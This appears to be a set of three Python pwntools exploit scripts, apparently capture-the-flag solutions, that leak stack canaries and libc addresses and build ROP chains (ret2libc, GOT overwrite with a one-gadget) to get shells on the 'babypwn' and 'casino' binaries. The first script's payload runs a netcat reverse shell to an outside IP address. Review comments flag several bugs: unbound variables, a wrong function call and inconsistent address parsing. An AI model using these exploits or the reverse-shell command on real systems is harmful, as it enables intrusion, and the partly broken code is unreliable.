from pwn import *
# pwntools target description for the first script: 32-bit little-endian
# Linux. This is what makes p32()/u32() and ROP(elf) below use 4-byte words.
context(arch='i386', os='linux', endian='little')
def leak_canary():
    # Leak the stack canary of the service on localhost:8181 and return it
    # as an int. The script expects the service to echo the 40-byte filler
    # back (recvuntil(pay)) and reads the 4 bytes that follow it.
    p = remote("localhost", 8181)
    print p.recvuntil('>')
    pay = "A"*40
    p.send("1\n")            # menu option 1; its prompt ends with ": "
    print p.recvuntil(": ")
    p.send(pay+"\n")
    p.recvuntil(pay)         # skip the echoed filler
    # The -10 adjusts the raw leaked value; presumably the trailing "\n"
    # (0x0a) overwrote the canary's low byte — challenge-specific, confirm.
    canary = u32(p.recv(4)[0:]) - 10
    p.close()
    return canary
def pay():
    # Build the stage-1 payload: 40 filler bytes, the canary, 12 more filler
    # bytes, then a ROP chain (built from ./babypwn) that recv()s a command
    # string into .bss and calls system() on it.
    # NOTE(review): `canary` is never bound in this function. __main__ calls
    # pay(canary), but the signature takes no parameter, so the call raises
    # TypeError before this body runs (and NameError if it did). `shell` is
    # local here, yet exploit() below also reads it unbound.
    shell="nc.traditional -e /bin/sh 108.61.161.168 4444"
    elf = ELF("./babypwn")
    rop = ROP(elf)
    pay = "A"*40 + p32(canary) + "A"* 12
    # recv(4, bss, len(shell)+1, 0): fd 4 is presumably the connected client
    # socket on the server side — confirm against the service.
    rop.recv(0x4,elf.bss(),len(shell)+1,0x0)
    rop.system(elf.bss())
    pay += rop.chain()
    return pay
def exploit(pay):
    # Send the payload over a fresh connection, then the command string the
    # ROP chain's recv() is waiting for. `pay` here is the payload bytes,
    # not the pay() function above (the parameter shadows it).
    # NOTE(review): `shell` is not defined in this scope — it is a local of
    # pay() — so p.send(shell) raises NameError.
    p = remote("localhost",8181)
    p.send("1\n")
    p.send(pay+"\n")
    p.send("3\n")           # presumably the menu option that returns and
                            # triggers the chain — confirm
    p.send(shell)
    p.close()
if __name__=='__main__':
    # Script 1 driver: leak the canary, build the payload, fire it.
    canary = leak_canary()
    print "[+]Canary : 0x%x" % canary
    # NOTE(review): pay() takes no arguments, so pay(canary) raises
    # TypeError; after this line the name `pay` is rebound to the payload
    # string, shadowing the function.
    pay = pay(canary)
    print "[+]Payload : %s" % pay
    print "----------Attack----------"
    exploit(pay)
from pwn import *
def exploit(pay):
    # Script 2: deliver the ret2libc payload over the global tube `p`
    # (bound in __main__ by `with remote(...) as p`) and drop to an
    # interactive session.
    p.sendline("3")      # menu option 3 ...
    p.sendline("32")     # ... then a size; presumably an input length — confirm
    p.send(pay)
    p.sendline("4")      # presumably the option that returns — confirm
    p.interactive()
def payload(leak):
    # Build a 64-bit ret2libc chain from the dict returned by leak():
    # 8 filler bytes, then pop rdi; "/bin/sh" address; system().
    # NOTE(review): leak() stores 'poprdi' and 'binsh' as str(int(...)),
    # i.e. decimal text, but they are parsed here with base 16; 'system'
    # is the raw "0x..." string and parses correctly. The two formats are
    # inconsistent.
    pay = "A"*8
    pay += p64(int(leak['poprdi'],16)) + p64(int(leak['binsh'],16)) + p64(int(leak['system'],16))
    return pay
def leak():
    # Read the libc and system() addresses the service prints, then derive
    # the gadget addresses from hard-coded libc offsets. Uses the global
    # tube `p` bound in __main__. Returns a dict of address strings.
    libc=dict()
    # Offsets within the remote libc build (page constants; libc-specific).
    libc['system']='0x45390'
    libc['poprdi']='0x21102'
    libc['binsh']='0x14721b'
    leak = dict()
    p.recvuntil(":")
    p.send("1\n")
    p.recvuntil("libc.so.6: ")
    libc_so = p.recv(18)[0:]           # "0x" + 16 hex digits
    leak['libc'] = libc_so
    p.send("2\n")
    p.recvuntil("Enter symbol: ")
    p.sendline("system")
    p.recvuntil("Symbol system: ")
    system = p.recv(18)[0:]
    leak['system'] = system
    # poprdi = system_addr - (system_off - poprdi_off), i.e. base + poprdi_off.
    leak['poprdi'] = str(int(leak['system'],16) - ( int(libc['system'],16) - int(libc['poprdi'],16) ))
    # NOTE(review): unlike the line above, this adds the binsh offset to the
    # system() address rather than to the libc base — looks inconsistent.
    # Both values are stored as decimal strings (str(int)), which payload()
    # then parses as hex.
    leak['binsh'] = str(int(leak['system'],16) + int(libc['binsh'],16))
    return leak
if __name__=='__main__':
    # Script 2 driver. The tube is bound to module-level `p`, which leak()
    # and exploit() read as a global; the target host is a placeholder.
    with remote("???.???.???.???", 9999) as p:
        # `leak = leak()` and `payload = payload(leak)` rebind the function
        # names to their results, so neither can be called a second time.
        leak = leak()
        print "[+]Libc address : %s" % leak['libc']
        print "[+]System address : %s" % leak['system']
        print "[+]Poprdi address : %s" % hex(int(leak['poprdi']))
        print "[+]Binsh address : %s" % hex(int(leak['binsh']))
        payload = payload(leak)
        exploit(payload)
from pwn import *
def canary():
    # Script 3: leak the 64-bit stack canary of ./casino via the global
    # tube `p`. Sends 40 filler bytes, waits for them to be echoed, and
    # takes the next 8 bytes as the canary. Returns it as an int.
    pay = "A"*40
    p.send("3\n")          # menu option 3
    p.recv(2048)
    p.sendline(pay)
    p.recvuntil(pay)       # skip the echoed filler
    cana = p.recv(8)[0:]
    print "[+]Canary : 0x%x" %u64(cana)
    return u64(cana)
def exploit(canary):
    # Two-stage attack on ./casino using the leaked canary:
    #  1. overflow with a chain that puts(puts@got) to leak libc, returning
    #     into `moveax` (presumably re-enters the vulnerable function — confirm);
    #  2. overflow again with a chain that gets() into exit@got, then send
    #     the computed one-gadget address and trigger exit().
    # All addresses are hard-coded for this binary / libc build.
    poprdi = 0x0000000000401083
    magic_gadget = 0x0000000000046483      # libc offset
    moveax = 0x400fee
    puts_plt = 0x4008C0
    puts_got = 0x602018
    libc_puts = 0x000000000006FD60          # libc offset of puts
    exit_got=0x6020A8
    gets_plt = 0x4009A0
    print p.recv(2048)
    p.send("3\n")
    p.recv(2048)
    pay = "A"*40
    pay += p64(canary)
    pay += "A"*8                            # saved rbp
    pay += p64(poprdi) + p64(puts_got) + p64(puts_plt) + p64(moveax)
    p.sendline(pay)
    p.recvuntil("A"*40)
    p.recv(8)                               # skip 8 echoed bytes after the filler
    tmp = p.recv(6)                         # puts() prints the 6 significant address bytes
    puts_leak = u64(tmp.ljust(8,"\x00"))    # zero-pad to 8 bytes for u64
    magic_gadget_leak = puts_leak - libc_puts + magic_gadget
    print "[+]Magic gadget : 0x%x" % magic_gadget_leak
    print p.recv(2048)
    p.send("3\n")
    p.recv(2048)
    pay = "A"*40
    pay += p64(canary) + "A"*8 + p64(poprdi) + p64(exit_got) + p64(gets_plt) + p64(moveax)
    p.sendline(pay)
    p.sendline(p64(magic_gadget_leak))      # consumed by gets() into exit@got
    p.send("5\n")                           # presumably the exit option — confirm
    p.interactive()
def int_overflow():
    # Preliminary step on ./casino via the global tube `p`: option 1 with
    # value 10000, then option 1 again. The name suggests this overflows a
    # counter/balance; the page does not show what it unlocks — confirm.
    p.send("1\n")
    p.recv(2048)
    p.send("10000\n")
    p.recv(2048)
    p.send("1\n")
    print p.recv(2048)
if __name__ == '__main__':
    # Script 3 driver against a local ./casino process. `p` is module-level
    # here, which is why canary(), exploit() and int_overflow() can use it.
    p = process("./casino")
    print p.recv(2048)
    int_overflow()
    exploit(canary())